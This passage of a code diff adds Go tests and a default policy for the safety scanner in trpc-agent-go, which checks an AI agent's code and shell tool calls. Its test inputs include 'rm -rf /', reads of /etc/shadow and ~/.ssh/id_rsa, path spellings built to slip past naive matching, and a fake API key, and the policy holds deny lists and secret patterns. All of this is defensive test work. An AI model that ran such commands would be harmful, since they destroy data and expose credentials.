--- a/tool/safety/permission_codeblocks_test.go
+++ b/tool/safety/permission_codeblocks_test.go
@@ -1,0 +1,158 @@
+//
+// Tencent is pleased to support the open source community by making
+// trpc-agent-go available.
+//
+// Copyright (C) 2026 Tencent.  All rights reserved.
+//
+// trpc-agent-go is licensed under the Apache License Version 2.0.
+//
+
+package safety
+
+import (
+	"context"
+	"encoding/json"
+	"testing"
+
+	"trpc.group/trpc-go/trpc-agent-go/tool"
+)
+
+// These tests are the regression suite for the code_blocks argument shape.
+//
+// The model-visible execute_code tool declares its input schema as
+//
+//	{ "code_blocks": [ {"language": "...", "code": "..."}, ... ] } }
+//
+// (see tool/codeexec/codeexec.go Declaration).  Before the fix,
+// extractScanRequest looked for a non-existent top-level "code" field, so
+// every real execute_code call failed extraction and CheckToolPermission
+// returned Ask regardless of the block content — the source was never
+// inspected by the scanner.  These tests drive the public CheckToolPermission
+// seam with the real code_blocks shape and assert that the verdict reflects
+// the block content rather than an automatic ask for a missing argument.
+//
+// The seam is the public PermissionPolicy.CheckToolPermission method; the
+// fakeBackendTool (declared in backend_provider_test.go) advertises
+// BackendCodeExec so inferBackend routes to the codeexec rule set without
+// relying on tool-name matching.
+
+func codeBlocksArgs(t *testing.T, blocks ...map[string]string) []byte {
+	t.Helper()
+	items := make([]map[string]any, len(blocks))
+	for i, b := range blocks {
+		items[i] = map[string]any{"language": b["language"], "code": b["code"]}
+	}
+	args, err := json.Marshal(map[string]any{"code_blocks": items})
+	if err != nil {
+		t.Fatalf("marshal args: %v", err)
+	}
+	return args
+}
+
+func newCodeExecPolicy(t *testing.T) *PermissionPolicy {
+	t.Helper()
+	// DefaultVerdict=allow so a safe block (no rule fires) yields Allow,
+	// letting the test distinguish "scanned and safe" from "never scanned".
+	policy := DefaultPolicy()
+	policy.DefaultVerdict = VerdictAllow
+	scanner, err := NewScanner(policy)
+	if err != nil {
+		t.Fatalf("NewScanner: %v", err)
+	}
+	return NewPermissionPolicyFromScanner(scanner, nil)
+}
+
+func checkCodeBlocks(t *testing.T, pp *PermissionPolicy, args []byte) tool.PermissionDecision {
+	t.Helper()
+	req := &tool.PermissionRequest{
+		Tool:      &fakeBackendTool{declared: BackendCodeExec, name: "execute_code"},
+		ToolName:  "execute_code",
+		Arguments: args,
+	}
+	dec, err := pp.CheckToolPermission(context.Background(), req)
+	if err != nil {
+		t.Fatalf("CheckToolPermission: %v", err)
+	}
+	return dec
+}
+
+// TestCheckToolPermission_CodeBlocks_DangerousCodeIsDenied proves that an
+// execute_code call carrying code_blocks reaches the scanner and is denied
+// when a block contains dangerous code.  Before the fix this call was
+// misrouted to Ask for a missing top-level "code" argument, so the dangerous
+// code below would have been sent for human review instead of blocked.
+func TestCheckToolPermission_CodeBlocks_DangerousCodeIsDenied(t *testing.T) {
+	pp := newCodeExecPolicy(t)
+	args := codeBlocksArgs(t, map[string]string{
+		"language": "python",
+		"code":     "import os; os.system('rm -rf /')",
+	})
+
+	dec := checkCodeBlocks(t, pp, args)
+
+	if dec.Action != tool.PermissionActionDeny {
+		t.Errorf("dangerous code_blocks: got action %q want %q "+
+			"(block source must be scanned and blocked, not auto-asked)",
+			dec.Action, tool.PermissionActionDeny)
+	}
+}
+
+// TestCheckToolPermission_CodeBlocks_SafeCodeIsAllowed proves that a
+// code_blocks call with safe content is not misrouted to Ask for a missing
+// top-level "code" argument.  With DefaultVerdict=allow and no rule firing,
+// the verdict must be Allow.
+func TestCheckToolPermission_CodeBlocks_SafeCodeIsAllowed(t *testing.T) {
+	pp := newCodeExecPolicy(t)
+	args := codeBlocksArgs(t, map[string]string{
+		"language": "python",
+		"code":     "print('hello')",
+	})
+
+	dec := checkCodeBlocks(t, pp, args)
+
+	if dec.Action != tool.PermissionActionAllow {
+		t.Errorf("safe code_blocks: got action %q want %q "+
+			"(must not auto-ask for a missing top-level code field)",
+			dec.Action, tool.PermissionActionAllow)
+	}
+}
+
+// TestCheckToolPermission_CodeBlocks_EachBlockIsScanned proves that when
+// code_blocks carries multiple blocks, every block's source reaches the
+// scanner: a dangerous second block is denied even when the first block is
+// safe.  This guards the contract that each block is scanned, not just the
+// first.
+func TestCheckToolPermission_CodeBlocks_EachBlockIsScanned(t *testing.T) {
+	pp := newCodeExecPolicy(t)
+	args := codeBlocksArgs(t,
+		map[string]string{"language": "python", "code": "print('safe')"},
+		map[string]string{"language": "python", "code": "import os; os.system('rm -rf /')"},
+	)
+
+	dec := checkCodeBlocks(t, pp, args)
+
+	if dec.Action != tool.PermissionActionDeny {
+		t.Errorf("second dangerous block must be scanned and denied: "+
+			"got action %q want %q", dec.Action, tool.PermissionActionDeny)
+	}
+}
+
+// TestCheckToolPermission_CodeBlocks_MissingArgumentAsks proves that an
+// execute_code call with no code_blocks at all still fails safe: the policy
+// cannot scan absent source, so it asks for human review rather than
+// allowing or denying blindly.
+func TestCheckToolPermission_CodeBlocks_MissingArgumentAsks(t *testing.T) {
+	pp := newCodeExecPolicy(t)
+	args, err := json.Marshal(map[string]any{"execution_id": "abc"})
+	if err != nil {
+		t.Fatalf("marshal args: %v", err)
+	}
+
+	dec := checkCodeBlocks(t, pp, args)
+
+	if dec.Action != tool.PermissionActionAsk {
+		t.Errorf("missing code_blocks: got action %q want %q "+
+			"(must fail safe to ask when there is no source to scan)",
+			dec.Action, tool.PermissionActionAsk)
+	}
+}

--- a/tool/safety/permission_nonexec_test.go
+++ b/tool/safety/permission_nonexec_test.go
@@ -1,0 +1,213 @@
+//
+// Tencent is pleased to support the open source community by making
+// trpc-agent-go available.
+//
+// Copyright (C) 2026 Tencent.  All rights reserved.
+//
+// trpc-agent-go is licensed under the Apache License Version 2.0.
+//
+
+package safety
+
+import (
+	"context"
+	"testing"
+
+	"trpc.group/trpc-go/trpc-agent-go/tool"
+)
+
+// These tests guard the contract that non-execution tools (file, search,
+// MCP, and ordinary tools that neither declare a backend nor match an
+// exec-like name) are not intercepted by the command/code safety scanner.
+//
+// Before the fix, inferBackend's name heuristic defaulted every unknown
+// tool to BackendWorkspaceExec, and extractScanRequest then demanded a
+// "command" argument.  Any non-exec tool whose valid arguments lack a
+// "command" field therefore failed extraction and CheckToolPermission
+// returned Ask — blocking tools the safety guard has no business
+// scanning.  These tests drive the public CheckToolPermission seam and
+// assert that such tools get Allow, while genuine exec tools still reach
+// their rule sets.
+//
+// The seam is the public PermissionPolicy.CheckToolPermission method.
+// fakeNoBackendTool (declared in backend_provider_test.go) stands in for
+// an ordinary tool that does not implement BackendProvider.
+
+// newNonExecPolicy returns a policy whose DefaultVerdict is Deny.  This
+// makes the tests strict: if a non-exec tool were ever scanned (instead
+// of short-circuited), the empty/absent command would be denied, so an
+// Allow result can only come from the short-circuit — not from the
+// scanner happening to allow the input.
+func newNonExecPolicy(t *testing.T) *PermissionPolicy {
+	t.Helper()
+	policy := DefaultPolicy()
+	policy.DefaultVerdict = VerdictDeny
+	scanner, err := NewScanner(policy)
+	if err != nil {
+		t.Fatalf("NewScanner: %v", err)
+	}
+	return NewPermissionPolicyFromScanner(scanner, nil)
+}
+
+// checkNonExec invokes CheckToolPermission for a tool that does not
+// declare a backend, using the given model-visible name and arguments.
+func checkNonExec(t *testing.T, pp *PermissionPolicy, name string, args []byte) tool.PermissionDecision {
+	t.Helper()
+	req := &tool.PermissionRequest{
+		Tool:      &fakeNoBackendTool{name: name},
+		ToolName:  name,
+		Arguments: args,
+	}
+	dec, err := pp.CheckToolPermission(context.Background(), req)
+	if err != nil {
+		t.Fatalf("CheckToolPermission: %v", err)
+	}
+	return dec
+}
+
+// TestCheckToolPermission_NonExecTool_AllowedWithoutCommand proves that a
+// tool whose name carries no exec signal (e.g. "file_read") and that does
+// not declare a backend is allowed even though its arguments have no
+// "command" field.  Before the fix this returned Ask.
+func TestCheckToolPermission_NonExecTool_AllowedWithoutCommand(t *testing.T) {
+	pp := newNonExecPolicy(t)
+	args := []byte(`{"path":"/tmp/data.txt"}`)
+
+	dec := checkNonExec(t, pp, "file_read", args)
+
+	if dec.Action != tool.PermissionActionAllow {
+		t.Errorf("non-exec tool without command: got action %q want %q "+
+			"(non-execution tools must not be blocked for lacking a command field)",
+			dec.Action, tool.PermissionActionAllow)
+	}
+}
+
+// TestCheckToolPermission_NonExecTool_AllowedEvenWithDangerousArgs proves
+// that a non-exec tool is allowed even when its arguments happen to
+// contain a string that the scanner would deny if it were a command
+// (e.g. "rm -rf /" as a search query).  The safety guard must not
+// interpret arbitrary argument fields as commands to scan.
+func TestCheckToolPermission_NonExecTool_AllowedEvenWithDangerousArgs(t *testing.T) {
+	pp := newNonExecPolicy(t)
+	args := []byte(`{"query":"rm -rf /"}`)
+
+	dec := checkNonExec(t, pp, "search", args)
+
+	if dec.Action != tool.PermissionActionAllow {
+		t.Errorf("non-exec tool with dangerous-looking args: got action %q want %q "+
+			"(non-execution tools must not be scanned for command risks)",
+			dec.Action, tool.PermissionActionAllow)
+	}
+}
+
+// TestCheckToolPermission_NonExecTool_AllowedWithEmptyArgs proves that a
+// non-exec tool with no arguments at all is allowed.  This guards against
+// a regression where empty arguments were treated as a missing "command".
+func TestCheckToolPermission_NonExecTool_AllowedWithEmptyArgs(t *testing.T) {
+	pp := newNonExecPolicy(t)
+
+	dec := checkNonExec(t, pp, "mcp_ping", nil)
+
+	if dec.Action != tool.PermissionActionAllow {
+		t.Errorf("non-exec tool with empty args: got action %q want %q",
+			dec.Action, tool.PermissionActionAllow)
+	}
+}
+
+// TestCheckToolPermission_NonExecTool_MCPStyleName proves that a tool name
+// resembling an MCP tool (which is not an execution tool) is allowed.
+// This is the MCP case called out in the issue.
+func TestCheckToolPermission_NonExecTool_MCPStyleName(t *testing.T) {
+	pp := newNonExecPolicy(t)
+	args := []byte(`{"server":"weather","method":"get_forecast"}`)
+
+	dec := checkNonExec(t, pp, "mcp_weather_get_forecast", args)
+
+	if dec.Action != tool.PermissionActionAllow {
+		t.Errorf("mcp-style tool: got action %q want %q",
+			dec.Action, tool.PermissionActionAllow)
+	}
+}
+
+// TestCheckToolPermission_ExecTool_StillScanned proves that the
+// short-circuit does not over-apply: a genuine exec tool that declares
+// BackendHostExec still reaches the scanner and is denied for a dangerous
+// command.  This guards against an over-broad "allow all non-declared"
+// implementation.
+func TestCheckToolPermission_ExecTool_StillScanned(t *testing.T) {
+	policy := DefaultPolicy()
+	policy.DefaultVerdict = VerdictAllow
+	scanner, err := NewScanner(policy)
+	if err != nil {
+		t.Fatalf("NewScanner: %v", err)
+	}
+	pp := NewPermissionPolicyFromScanner(scanner, nil)
+
+	req := &tool.PermissionRequest{
+		Tool:      &fakeBackendTool{declared: BackendHostExec, name: "exec_command"},
+		ToolName:  "exec_command",
+		Arguments: []byte(`{"command":"rm -rf /"}`),
+	}
+	dec, err := pp.CheckToolPermission(context.Background(), req)
+	if err != nil {
+		t.Fatalf("CheckToolPermission: %v", err)
+	}
+	if dec.Action != tool.PermissionActionDeny {
+		t.Errorf("exec tool with dangerous command: got action %q want %q "+
+			"(declared exec tools must still be scanned)",
+			dec.Action, tool.PermissionActionDeny)
+	}
+}
+
+// TestCheckToolPermission_ExecTool_WorkspaceExecStillScanned proves that a
+// workspace_exec tool that declares its backend is still scanned (the
+// other half of the over-broad-short-circuit guard).
+func TestCheckToolPermission_ExecTool_WorkspaceExecStillScanned(t *testing.T) {
+	policy := DefaultPolicy()
+	policy.DefaultVerdict = VerdictAllow
+	scanner, err := NewScanner(policy)
+	if err != nil {
+		t.Fatalf("NewScanner: %v", err)
+	}
+	pp := NewPermissionPolicyFromScanner(scanner, nil)
+
+	req := &tool.PermissionRequest{
+		Tool:      &fakeBackendTool{declared: BackendWorkspaceExec, name: "workspace_exec"},
+		ToolName:  "workspace_exec",
+		Arguments: []byte(`{"command":"rm -rf /"}`),
+	}
+	dec, err := pp.CheckToolPermission(context.Background(), req)
+	if err != nil {
+		t.Fatalf("CheckToolPermission: %v", err)
+	}
+	if dec.Action != tool.PermissionActionDeny {
+		t.Errorf("workspace_exec with dangerous command: got action %q want %q",
+			dec.Action, tool.PermissionActionDeny)
+	}
+}
+
+// TestCheckToolPermission_ExecTool_CodeExecStillScanned proves that an
+// execute_code tool that declares BackendCodeExec is still scanned.
+func TestCheckToolPermission_ExecTool_CodeExecStillScanned(t *testing.T) {
+	policy := DefaultPolicy()
+	policy.DefaultVerdict = VerdictAllow
+	scanner, err := NewScanner(policy)
+	if err != nil {
+		t.Fatalf("NewScanner: %v", err)
+	}
+	pp := NewPermissionPolicyFromScanner(scanner, nil)
+
+	req := &tool.PermissionRequest{
+		Tool:      &fakeBackendTool{declared: BackendCodeExec, name: "execute_code"},
+		ToolName:  "execute_code",
+		Arguments: []byte(`{"code_blocks":[{"language":"python","code":"import os; os.system('rm -rf /')"}]}`),
+	}
+	dec, err := pp.CheckToolPermission(context.Background(), req)
+	if err != nil {
+		t.Fatalf("CheckToolPermission: %v", err)
+	}
+	if dec.Action != tool.PermissionActionDeny {
+		t.Errorf("execute_code with dangerous block: got action %q want %q",
+			dec.Action, tool.PermissionActionDeny)
+	}
+}

--- a/tool/safety/permission_normalized_paths_test.go
+++ b/tool/safety/permission_normalized_paths_test.go
@@ -1,0 +1,96 @@
+//
+// Tencent is pleased to support the open source community by making
+// trpc-agent-go available.
+//
+// Copyright (C) 2026 Tencent.  All rights reserved.
+//
+// trpc-agent-go is licensed under the Apache License Version 2.0.
+//
+
+package safety
+
+import "testing"
+
+// These tests are the regression suite for issue 08: the forbidden-path
+// rule must match against the parsed shell argv with paths normalized
+// (quote-stripping, filepath.Clean, tilde expansion) instead of running
+// strings.Contains over the raw command text.  Shell-equivalent spellings
+// such as `cat /etc/"shadow"`, `cat /etc//shadow` and
+// `cat /etc/../etc/shadow` must all be blocked by a configured
+// `/etc/shadow`, while a genuinely different path such as
+// `/etc/shadow.safe` must not be.
+//
+// The seam is the public Scanner.ScanCommand method (via the scan helper in
+// safety_test.go) driving the default rule set with a custom
+// forbidden_paths list.
+
+// newForbiddenPathsScanner returns a scanner whose commands allow the safe
+// read commands used by these tests (cat, echo, ls) and whose only risk
+// trigger is the configured forbidden path list.  DefaultVerdict is Allow so
+// a command that fires no rule yields Allow, letting the tests distinguish
+// "scanned and safe" from "rule did not fire".
+func newForbiddenPathsScanner(t *testing.T, forbidden []string) *Scanner {
+	t.Helper()
+	policy := DefaultPolicy()
+	policy.DefaultVerdict = VerdictAllow
+	policy.Commands.Allowed = []string{"cat", "echo", "ls"}
+	policy.Commands.Denied = nil
+	policy.ForbiddenPaths = forbidden
+	s, err := NewScanner(policy)
+	if err != nil {
+		t.Fatalf("NewScanner: %v", err)
+	}
+	return s
+}
+
+// TestDangerousCommand_NormalizedPathSpellings proves that the three shell-
+// equivalent spellings of /etc/shadow all match a configured /etc/shadow
+// entry.  Before the fix, pathMatches did a raw substring match, so the
+// quoted, double-slash and `..` forms all evaded detection.
+func TestDangerousCommand_NormalizedPathSpellings(t *testing.T) {
+	s := newForbiddenPathsScanner(t, []string{"/etc/shadow"})
+	cases := []string{
+		`cat /etc/"shadow"`,
+		"cat /etc//shadow",
+		"cat /etc/../etc/shadow",
+	}
+	for _, cmd := range cases {
+		t.Run(cmd, func(t *testing.T) {
+			report := scan(t, s, cmd, BackendWorkspaceExec)
+			assertVerdict(t, report, VerdictDeny)
+			assertHasRule(t, report, "dangerous_command")
+		})
+	}
+}
+
+// TestDangerousCommand_GlobPathMatch proves that a glob forbidden path such
+// as /secret/*/key matches a real path /secret/user/key.  The advertised
+// glob behaviour is implemented (the default policy ships *.env,
+// *credentials* and *secret*), so the doc and behaviour agree.
+func TestDangerousCommand_GlobPathMatch(t *testing.T) {
+	s := newForbiddenPathsScanner(t, []string{"/secret/*/key"})
+	report := scan(t, s, "cat /secret/user/key", BackendWorkspaceExec)
+	assertVerdict(t, report, VerdictDeny)
+	assertHasRule(t, report, "dangerous_command")
+}
+
+// TestDangerousCommand_DistinctPathNotMatched guards against over-broad
+// normalization: /etc/shadow.safe is a different file from /etc/shadow and
+// must not be blocked by the /etc/shadow entry.  A substring matcher would
+// (wrongly) catch it.
+func TestDangerousCommand_DistinctPathNotMatched(t *testing.T) {
+	s := newForbiddenPathsScanner(t, []string{"/etc/shadow"})
+	report := scan(t, s, "cat /etc/shadow.safe", BackendWorkspaceExec)
+	assertVerdict(t, report, VerdictAllow)
+}
+
+// TestDangerousCommand_TildeSubpathMatches proves that a forbidden directory
+// in tilde form (~/.ssh) still blocks access to a file beneath it
+// (~/.ssh/id_rsa).  This preserves the existing credential-access protection
+// while operating on normalized argv rather than raw text.
+func TestDangerousCommand_TildeSubpathMatches(t *testing.T) {
+	s := newForbiddenPathsScanner(t, []string{"~/.ssh"})
+	report := scan(t, s, "cat ~/.ssh/id_rsa", BackendWorkspaceExec)
+	assertVerdict(t, report, VerdictDeny)
+	assertHasRule(t, report, "dangerous_command")
+}

--- a/tool/safety/permission_secret_redaction_test.go
+++ b/tool/safety/permission_secret_redaction_test.go
@@ -1,0 +1,107 @@
+//
+// Tencent is pleased to support the open source community by making
+// trpc-agent-go available.
+//
+// Copyright (C) 2026 Tencent.  All rights reserved.
+//
+// trpc-agent-go is licensed under the Apache License Version 2.0.
+//
+
+package safety
+
+import (
+	"context"
+	"strings"
+	"testing"
+
+	"trpc.group/trpc-go/trpc-agent-go/tool"
+)
+
+// These tests guard the contract that a secret detected by the
+// sensitive_leak rule is not echoed into the model-visible permission
+// result.  Before the fix, sensitiveLeakRule.Check copied up to 40 bytes
+// of the matched secret into the risk evidence, and buildRecommendation /
+// toPermissionDecision then surfaced that evidence in the
+// PermissionDecision.Reason.  A real-looking API key in a scanned command
+// therefore leaked back into the conversation and downstream result
+// logging.
+//
+// The seam is the public PermissionPolicy.CheckToolPermission method.
+// fakeBackendTool (declared in backend_provider_test.go) advertises
+// BackendWorkspaceExec so the command is routed through the scanner's rule
+// set.  We assert both sides of the contract: the deny verdict is still
+// produced (redaction must not weaken detection), and the literal key
+// string is absent from the returned reason (redaction must hide the
+// secret).
+//
+// The key below is a deliberately fake value used only to prove the
+// redaction contract; it matches the default `sk-[a-zA-Z0-9]{32,}`
+// sensitive pattern.
+const redactionTestAPIKey = "sk-ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmn"
+
+// redactionTestKeyPrefix is a leading slice of the fake key that falls well
+// inside the pre-fix evidence truncation window (40 bytes), so it would be
+// echoed verbatim by the old `truncate(match, 40)` evidence.  We assert its
+// absence rather than the whole key's, because the old bug truncated long
+// matches — a whole-key assertion would pass even with the bug present.
+const redactionTestKeyPrefix = "sk-ABCDEFGHIJKLMNOPQ"
+
+func newWorkspaceExecPolicy(t *testing.T) *PermissionPolicy {
+	t.Helper()
+	policy := DefaultPolicy()
+	scanner, err := NewScanner(policy)
+	if err != nil {
+		t.Fatalf("NewScanner: %v", err)
+	}
+	return NewPermissionPolicyFromScanner(scanner, nil)
+}
+
+func checkCommand(t *testing.T, pp *PermissionPolicy, command string) tool.PermissionDecision {
+	t.Helper()
+	req := &tool.PermissionRequest{
+		Tool:      &fakeBackendTool{declared: BackendWorkspaceExec, name: "workspace_exec"},
+		ToolName:  "workspace_exec",
+		Arguments: []byte(`{"command":"` + command + `"}`),
+	}
+	dec, err := pp.CheckToolPermission(context.Background(), req)
+	if err != nil {
+		t.Fatalf("CheckToolPermission: %v", err)
+	}
+	return dec
+}
+
+// TestCheckToolPermission_SecretDenied_ReasonDoesNotEchoKey proves that
+// when the sensitive_leak rule denies a command containing a real-looking
+// API key, the literal key string does not appear anywhere in the returned
+// PermissionDecision reason.  Before the fix the key's bytes were copied
+// into the risk evidence and surfaced via buildRecommendation into the
+// denied reason.
+func TestCheckToolPermission_SecretDenied_ReasonDoesNotEchoKey(t *testing.T) {
+	pp := newWorkspaceExecPolicy(t)
+	command := "echo " + redactionTestAPIKey
+
+	dec := checkCommand(t, pp, command)
+
+	if strings.Contains(dec.Reason, redactionTestKeyPrefix) {
+		t.Errorf("permission reason must not echo the detected secret:\n"+
+			"reason contains the literal key prefix %q\nreason: %s",
+			redactionTestKeyPrefix, dec.Reason)
+	}
+}
+
+// TestCheckToolPermission_SecretDenied_VerdictStillDeny proves that
+// redacting the evidence does not weaken detection: a command embedding a
+// real-looking API key is still denied.  This guards the "redaction must
+// not suppress the risk" half of the contract.
+func TestCheckToolPermission_SecretDenied_VerdictStillDeny(t *testing.T) {
+	pp := newWorkspaceExecPolicy(t)
+	command := "echo " + redactionTestAPIKey
+
+	dec := checkCommand(t, pp, command)
+
+	if dec.Action != tool.PermissionActionDeny {
+		t.Errorf("command with embedded secret: got action %q want %q "+
+			"(redaction must not weaken detection)",
+			dec.Action, tool.PermissionActionDeny)
+	}
+}

--- a/tool/safety/policy.go
+++ b/tool/safety/policy.go
@@ -1,0 +1,148 @@
+//
+// Tencent is pleased to support the open source community by making trpc-agent-go available.
+//
+// Copyright (C) 2025 Tencent.  All rights reserved.
+//
+// trpc-agent-go is licensed under the Apache License Version 2.0.
+//
+
+package safety
+
+import "context"
+
+// Rule detects a specific category of risk in a scan request.
+// Implementations must be safe for concurrent use.
+type Rule interface {
+	// ID returns the unique identifier for this rule.
+	ID() string
+	// Name returns a human-readable name.
+	Name() string
+	// Check inspects req and returns a Risk if the rule fires,
+	// or nil if the request passes this rule.
+	Check(ctx context.Context, req *ScanRequest) *Risk
+}
+
+// Policy is the configurable safety policy loaded from a YAML or
+// JSON file.
+type Policy struct {
+	// Version is the policy schema version.
+	Version string `yaml:"version" json:"version"`
+	// DefaultVerdict is used when no rule fires.
+	DefaultVerdict Verdict `yaml:"default_verdict" json:"default_verdict"`
+	// Commands controls allowed and denied executable names.
+	Commands CommandPolicy `yaml:"commands" json:"commands"`
+	// ForbiddenPaths are path patterns that must never be accessed.
+	ForbiddenPaths []string `yaml:"forbidden_paths" json:"forbidden_paths"`
+	// NetworkWhitelist is the set of allowed hostnames for egress.
+	NetworkWhitelist []string `yaml:"network_whitelist" json:"network_whitelist"`
+	// ResourceLimits constrains execution resources.
+	ResourceLimits ResourceLimits `yaml:"resource_limits" json:"resource_limits"`
+	// DependencyPolicy controls package installation.
+	DependencyPolicy DependencyPolicy `yaml:"dependency_policy" json:"dependency_policy"`
+	// SensitivePatterns are regex patterns that match secrets.
+	SensitivePatterns []string `yaml:"sensitive_patterns" json:"sensitive_patterns"`
+	// BackendPolicies holds per-backend overrides.
+	BackendPolicies BackendPolicies `yaml:"backend_policies" json:"backend_policies"`
+}
+
+// CommandPolicy holds the allow/deny lists for executable names.
+type CommandPolicy struct {
+	// Allowed is the set of permitted executable names.
+	Allowed []string `yaml:"allowed" json:"allowed"`
+	// Denied is the set of forbidden executable names.
+	Denied []string `yaml:"denied" json:"denied"`
+}
+
+// ResourceLimits constrains execution-time resources.
+type ResourceLimits struct {
+	// AllowedSleepSeconds is the maximum allowed sleep duration.
+	// A value of 0 disables the sleep-duration check.
+	AllowedSleepSeconds int `yaml:"allowed_sleep_seconds" json:"allowed_sleep_seconds"`
+}
+
+// DependencyPolicy controls package manager usage.
+type DependencyPolicy struct {
+	// AllowedManagers is the set of permitted package managers.
+	AllowedManagers []string `yaml:"allowed_managers" json:"allowed_managers"`
+	// DeniedPackages is the set of forbidden package names.
+	DeniedPackages []string `yaml:"denied_packages" json:"denied_packages"`
+}
+
+// BackendPolicies holds per-backend overrides.
+type BackendPolicies struct {
+	// WorkspaceExec configures the workspaceexec backend.
+	WorkspaceExec BackendPolicy `yaml:"workspaceexec" json:"workspaceexec"`
+	// HostExec configures the hostexec backend.
+	HostExec BackendPolicy `yaml:"hostexec" json:"hostexec"`
+}
+
+// BackendPolicy is the per-backend safety configuration.
+type BackendPolicy struct {
+	// AllowBackground controls whether background processes are permitted.
+	AllowBackground bool `yaml:"allow_background" json:"allow_background"`
+	// RequireHumanReview controls whether all commands need review.
+	RequireHumanReview bool `yaml:"require_human_review" json:"require_human_review"`
+}
+
+// DefaultPolicy returns a policy with sensible defaults that fail
+// closed for the most dangerous categories (destruction, credential
+// access, non-whitelisted egress) while allowing common safe commands.
+func DefaultPolicy() *Policy {
+	return &Policy{
+		Version:        "1.0",
+		DefaultVerdict: VerdictAsk,
+		Commands: CommandPolicy{
+			Allowed: []string{
+				"ls", "cat", "grep", "find", "git", "go", "python",
+				"echo", "pwd", "head", "tail", "wc", "sort", "uniq",
+				"diff", "make", "test", "mkdir", "cp", "mv", "touch",
+			},
+			Denied: []string{
+				"rm", "dd", "mkfs", "shutdown", "reboot",
+				"halt", "poweroff", "killall", "pkill",
+			},
+		},
+		ForbiddenPaths: []string{
+			"~/.ssh",
+			"~/.aws",
+			"~/.gnupg",
+			"/etc/passwd",
+			"/etc/shadow",
+			"*.env",
+			"*credentials*",
+			"*secret*",
+		},
+		NetworkWhitelist: []string{
+			"github.com",
+			"api.github.com",
+			"proxy.golang.org",
+			"pypi.org",
+			"registry.npmjs.org",
+		},
+		ResourceLimits: ResourceLimits{
+			AllowedSleepSeconds: 60,
+		},
+		DependencyPolicy: DependencyPolicy{
+			AllowedManagers: []string{"go", "npm", "pip"},
+			DeniedPackages:  []string{},
+		},
+		SensitivePatterns: []string{
+			`sk-[a-zA-Z0-9]{32,}`,
+			`ghp_[a-zA-Z0-9]{36}`,
+			`-----BEGIN.*PRIVATE KEY-----`,
+			`(?i)password\s*=\s*['"][^'"]+['"]`,
+			`(?i)api[_-]?key\s*=\s*['"][^'"]+['"]`,
+			`(?i)token\s*=\s*['"][^'"]+['"]`,
+		},
+		BackendPolicies: BackendPolicies{
+			WorkspaceExec: BackendPolicy{
+				AllowBackground:    false,
+				RequireHumanReview: false,
+			},
+			HostExec: BackendPolicy{
+				AllowBackground:    false,
+				RequireHumanReview: true,
+			},
+		},
+	}
+}

--- a/tool/safety/policy.go
+++ b/tool/safety/policy.go
@@ -43,6 +43,12 @@ type Policy struct {
 	SensitivePatterns []string `yaml:"sensitive_patterns" json:"sensitive_patterns"`
 	// BackendPolicies holds per-backend overrides.
 	BackendPolicies BackendPolicies `yaml:"backend_policies" json:"backend_policies"`
+
+	// Deprecated: EnvWhitelist was present in an earlier schema but is
+	// no longer enforced.  The field is retained so that old policy
+	// files containing it load under KnownFields(true) without error.
+	// It has no effect on scanning and is excluded from JSON output.
+	EnvWhitelist []string `yaml:"env_whitelist,omitempty" json:"-"`
 }
 
 // CommandPolicy holds the allow/deny lists for executable names.
@@ -58,6 +64,15 @@ type ResourceLimits struct {
 	// AllowedSleepSeconds is the maximum allowed sleep duration.
 	// A value of 0 disables the sleep-duration check.
 	AllowedSleepSeconds int `yaml:"allowed_sleep_seconds" json:"allowed_sleep_seconds"`
+
+	// Deprecated: the following fields were present in an earlier
+	// schema but are no longer enforced.  They are retained so that
+	// old policy files containing them load under KnownFields(true)
+	// without error.  They have no effect on scanning and are
+	// excluded from JSON output.
+	MaxTimeoutSeconds      int `yaml:"max_timeout_seconds,omitempty" json:"-"`
+	MaxOutputBytes         int `yaml:"max_output_bytes,omitempty" json:"-"`
+	MaxConcurrentProcesses int `yaml:"max_concurrent_processes,omitempty" json:"-"`
 }
 
 // DependencyPolicy controls package manager usage.
@@ -82,6 +97,12 @@ type BackendPolicy struct {
 	AllowBackground bool `yaml:"allow_background" json:"allow_background"`
 	// RequireHumanReview controls whether all commands need review.
 	RequireHumanReview bool `yaml:"require_human_review" json:"require_human_review"`
+
+	// Deprecated: AllowPty was present in an earlier schema but is no
+	// longer enforced.  The field is retained so that old policy files
+	// containing it load under KnownFields(true) without error.  It
+	// has no effect on scanning and is excluded from JSON output.
+	AllowPty bool `yaml:"allow_pty,omitempty" json:"-"`
 }
 
 // DefaultPolicy returns a policy with sensible defaults that fail

--- a/tool/safety/policy_fields_test.go
+++ b/tool/safety/policy_fields_test.go
@@ -1,0 +1,222 @@
+//
+// Tencent is pleased to support the open source community by making trpc-agent-go available.
+//
+// Copyright (C) 2026 Tencent.  All rights reserved.
+//
+// trpc-agent-go is licensed under the Apache License Version 2.0.
+//
+
+package safety
+
+import (
+	"os"
+	"path/filepath"
+	"testing"
+)
+
+// ----------------------------------------------------------------------
+// DeniedPackages edge-case tests
+// ----------------------------------------------------------------------
+
+func TestDeniedPackage_VersionSpecifier(t *testing.T) {
+	policy := DefaultPolicy()
+	policy.Commands.Allowed = []string{"pip"}
+	policy.DependencyPolicy.AllowedManagers = []string{"pip"}
+	policy.DependencyPolicy.DeniedPackages = []string{"malicious-pkg"}
+
+	s, err := NewScanner(policy)
+	if err != nil {
+		t.Fatalf("NewScanner: %v", err)
+	}
+
+	report := scan(t, s, "pip install malicious-pkg==1.0", BackendWorkspaceExec)
+	if report.Verdict != VerdictDeny {
+		t.Errorf("denied package with version specifier must be denied: got %s; risks=%+v",
+			report.Verdict, report.Risks)
+	}
+}
+
+func TestDeniedPackage_NotInCommand(t *testing.T) {
+	policy := DefaultPolicy()
+	policy.Commands.Allowed = []string{"pip"}
+	policy.DependencyPolicy.AllowedManagers = []string{"pip"}
+	policy.DependencyPolicy.DeniedPackages = []string{"malicious-pkg"}
+
+	s, err := NewScanner(policy)
+	if err != nil {
+		t.Fatalf("NewScanner: %v", err)
+	}
+
+	report := scan(t, s, "pip install safe-pkg", BackendWorkspaceExec)
+	// A non-denied package from an allowed manager should be medium
+	// risk (ask), not deny.
+	if report.Verdict == VerdictDeny {
+		t.Errorf("non-denied package should not be denied: got %s; risks=%+v",
+			report.Verdict, report.Risks)
+	}
+}
+
+func TestDeniedPackage_MultiplePackages(t *testing.T) {
+	policy := DefaultPolicy()
+	policy.Commands.Allowed = []string{"pip"}
+	policy.DependencyPolicy.AllowedManagers = []string{"pip"}
+	policy.DependencyPolicy.DeniedPackages = []string{"malicious-pkg"}
+
+	s, err := NewScanner(policy)
+	if err != nil {
